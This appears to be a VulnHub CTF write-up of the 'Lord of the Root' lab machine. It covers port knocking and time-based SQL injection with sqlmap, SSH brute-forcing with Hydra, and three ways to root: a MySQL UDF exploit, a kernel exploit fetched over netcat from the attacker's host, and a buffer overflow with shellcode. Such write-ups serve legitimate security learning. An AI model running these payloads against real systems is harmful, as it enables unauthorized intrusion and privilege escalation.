Overview
This machine begins w/ SSH revealing a port knocking sequence, allowing us to open an additional port TCP/1337 running HTTP. The webpage has a login page that is susceptible to SQLi, allowing us to enumerate the Webapp database revealing several credentials. With the credentials, we are able to bruteforce SSH and obtain a shell.
There are 3 ways to obtain root, the easiest way is via a kernel exploit and can be done by downloading an exploit on exploit db.
Another way is via mysql is running as root, allowing us to access mysql to create a UDF function to escalate our privilege, obtaining root.
The final way (hardest) is a buffer overflow vulnerability existing in the SUID file.
Recon
- Only TCP/22 (SSH) is up
- Requires Port Knocking to open up ports
TCP/22 (SSH)
Port Knocking
- Connect to SSH
![]()
- Could be port knocking?
- Port Knock
1 2 3 4 5
┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit] └─# knock -v $ip 1 2 3; hitting tcp 192.168.236.10:1 hitting tcp 192.168.236.10:2 hitting tcp 192.168.236.10:3
- Check for newly opened ports
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit] └─# nmap $ip -p- Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 01:08 +08 Nmap scan report for 192.168.236.10 Host is up (0.00044s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 1337/tcp open waste MAC Address: 08:00:27:FF:4B:98 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 104.95 seconds
TCP/1337
TCP/1337 (HTTP)
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit]
└─# nmap -sV -sC -A $ip -p 1337
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 01:23 +08
Nmap scan report for 192.168.236.10
Host is up (0.00047s latency).
PORT STATE SERVICE VERSION
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:FF:4B:98 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
TCP/1337 (HTTP)
FFUF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit]
└─# ffuf -u http://$ip:1337/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php' -fw 21
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.236.10:1337/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 21
________________________________________________
[Status: 200, Size: 64, Words: 3, Lines: 4]
404.html [Status: 200, Size: 116, Words: 3, Lines: 5]
images [Status: 301, Size: 323, Words: 20, Lines: 10]
index.html [Status: 200, Size: 64, Words: 3, Lines: 4]
index.html [Status: 200, Size: 64, Words: 3, Lines: 4]
:: Progress: [18460/18460] :: Job [1/1] :: 4242 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
404.htmlimagesindex.html
Initial Foothold
TCP/80 (HTTP) - SQLi (Blind) Database Enumeration
- View enumerated directories
index.html![]()
404.html![]()
- Hidden Text
images![]()
- Download all images & Analyze for hidden text/file
- Could not find any
- Decode hidden text
1 2 3 4 5 6
┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit] └─# echo -n THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh | base64 -d Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer! ┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit] └─# echo -n THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh | base64 -d | base64 -d /978345210/index.phpbase64: invalid input
/978345210/index.php
- Proceed to
/978345210/index.php![]()
- Tried to bruteforce it, did not work
- Try SQLi Payloads
- Try Time Based SQLi
1
'or sleep(5)#
- It worked
- Try SQLi Auth Bypass payload
1
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
![]()
![]()
- Successfully login, could not do anything w/ the login apge
- Instead of Authentication Bypass, we have to enumerate the database
- Run SQLMap
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit/SQL] └─# sqlmap -r sqli.txt --dump --output-dir=$(pwd)/sqlmap -v 5 Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=test' AND (SELECT 7506 FROM (SELECT(SLEEP(5)))vOBo) AND 'enuE'='enuE&password=test&submit= Login Database: Webapp Table: Users [5 entries] +----+------------------+----------+ | id | password | username | +----+------------------+----------+ | 1 | iwilltakethering | frodo | | 2 | MyPreciousR00t | smeagol | | 3 | AndMySword | aragorn | | 4 | AndMyBow | legolas | | 5 | AndMyAxe | gimli | +----+------------------+----------+
- Create wordlist
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit/SQL] └─# cat sqlmap/192.168.236.10/dump/Webapp/Users.csv | cut -d ',' -f2 | sed 's/password//g' | awk 'NF' > passwords.txt ┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit/SQL] └─# cat sqlmap/192.168.236.10/dump/Webapp/Users.csv | cut -d ',' -f3 | sed 's/username//g' | awk 'NF' > usernames.txt ┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit/SQL] └─# cat usernames.txt frodo smeagol aragorn legolas gimli ┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit/SQL] └─# cat passwords.txt iwilltakethering MyPreciousR00t AndMySword AndMyBow
TCP/22 (SSH) - Bruteforce
- Bruteforce SSH
1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit/SQL] └─# hydra -L usernames.txt -P passwords.txt ssh://$ip -e nsr Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-25 04:16:37 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries per task [DATA] attacking ssh://192.168.236.10:22/ [22][ssh] host: 192.168.236.10 login: smeagol password: MyPreciousR00t 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-25 04:16:43
- smeagol:MyPreciousR00t
- Access SSH w/ smeagol:MyPreciousR00t
![]()
Privilege Escalation
Root - Via MySQL running as Root
- Linpeas
![]()
- Check ASLR
1 2
smeagol@LordOfTheRoot:/SECRET/door1$ cat /proc/sys/kernel/randomize_va_space 2
- ASLR is enabled, hard/unable to do BOF
- Check system processes running as root
1 2 3 4
smeagol@LordOfTheRoot:/SECRET/door1$ ps aux | grep root ... root 1183 0.0 0.8 327004 8748 ? Ssl 16:31 0:11 /usr/sbin/mysqld ...
![]()
mysqldrunning as root
- Find SQL Credentials
1 2 3 4 5
smeagol@LordOfTheRoot:/var/www$ grep -Rnw $(pwd)/*/* -ie "sql" --color=always 2>/dev/null /var/www/978345210/login.php:19: $sql="select username, password from Users where username='".$username."' AND password='".$password."';"; /var/www/978345210/login.php:20: //echo $sql; /var/www/978345210/login.php:21:
/var/www/978345210/login.php
- View
login.php![]()
- root:darkshadow
- Access mysql w/ root:darkshadow
- MySQL running as root exploit
- https://github.com/1N3/PrivEsc/blob/master/mysql/raptor_udf2.c
- https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf
- Exploit
- Download
raptor_udf2.c1
wget https://github.com/1N3/PrivEsc/blob/master/mysql/raptor_udf2.c
- Compile
raptor_udf2.c1 2
smeagol@LordOfTheRoot:/tmp$ gcc -g -c raptor_udf2.c smeagol@LordOfTheRoot:/tmp$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
- Access mysql
1
mysql -u root -p darkshadow
- Import
raptor_udf.so1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
mysql> create table foo(line blob); Query OK, 0 rows affected (0.00 sec) mysql> insert into foo values(load_file('/tmp/raptor_udf2.so')); Query OK, 1 row affected (0.00 sec) mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; Query OK, 1 row affected (0.00 sec) mysql> create function do_system returns integer soname 'raptor_udf2.so'; Query OK, 0 rows affected (0.00 sec) mysql> select * from mysql.func; +-----------+-----+----------------+----------+ | name | ret | dl | type | +-----------+-----+----------------+----------+ | do_system | 2 | raptor_udf2.so | function | +-----------+-----+----------------+----------+ 1 row in set (0.00 sec) - Create rootbash
1
select do_system('cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash');![]()
- Download
- Check if
rootbashexists1 2 3 4 5 6 7 8 9 10 11 12
smeagol@LordOfTheRoot:/tmp$ ls -la total 1004 drwxrwxrwt 4 root root 4096 Jan 25 08:57 . drwxr-xr-x 23 root root 4096 Sep 22 2015 .. drwxrwxrwt 2 root root 4096 Jan 25 07:52 .ICE-unix -rw-rw-r-- 1 smeagol smeagol 3314 Jan 25 00:27 raptor_udf2.c -rw-rw-r-- 1 smeagol smeagol 3192 Jan 25 08:46 raptor_udf2.o -rwxrwxr-x 1 smeagol smeagol 8418 Jan 25 08:46 raptor_udf2.so -rwsr-s--x 1 root root 986672 Jan 25 08:56 rootbash -r--r--r-- 1 root root 11 Jan 25 07:52 .X0-lock drwxrwxrwt 2 root root 4096 Jan 25 07:52 .X11-unix smeagol@LordOfTheRoot:/tmp$
- Obtain root shell
![]()
- Flag
1 2 3 4
rootbash-4.3# cat Flag.txt “There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.” – Gandalf rootbash-4.3#
Root - Via Kernel Exploit
- Linpeas
![]()
3.19.0-25-genericUbuntu 14.04
- Find exploits for
3.19.0-25-generic, Ubuntu 14.04- https://www.exploit-db.com/exploits/39166
- Transfer to target & exploit
1 2 3 4
smeagol@LordOfTheRoot:/tmp$ nc 192.168.236.4 4444 > 39166.c smeagol@LordOfTheRoot:/tmp$ gcc 39166.c -o exploit smeagol@LordOfTheRoot:/tmp$ ./exploit root@LordOfTheRoot:/tmp#
![]()
Root - Via BufferOverflow
- Determine Buffer Size till EIP overflows with A
- Via fuzzing
- Buffer Size: 200
- Create msf-pattern
1 2 3
msf-pattern_create -l 200 Pattern: run $(python -c 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"')
- Use
env1 2 3 4 5
env - gdb /SECRET/door3/file show env unset env LINES unset env COLUMNS show env
- Determine Pattern Address & Return Address
1 2 3 4 5 6 7 8 9
# Determine Return Address # Address must not have badChars i r # Look at ESP i r esp x/40x $esp # Determine Pattern Address # Or you can just look at where program crashed <0xADDRESS in ?? ()> i r eip
- Pattern Address:
0x41376641 - Return Address:
0xbfb82e80- Little Endian:
\x80\x2e\xb8\xbf
- Little Endian:
- Pattern Address:
- Determine EIP offset
1
msf-pattern_offset -q 0x41376641
- EIP offset: 171
- Ensure EIP offset
1
run $(python -c 'print "A" * 171 + "B" * 4 + "C" * 200')
- Shellcode
1 2 3
┌──(root💀kali)-[~/vulnHub/Lord-of-the-root-1.0.1/192.168.236.10/exploit/bof] └─# cat shellcode | sed 's/"//g' | tr -d '\n' \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80
- Exploit
1
for x in {1..1000}; do env - /SECRET/door3/file $(python -c 'print "A"*171 + "\x80\x2e\xb8\xbf" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"'); done
Comments powered by Disqus.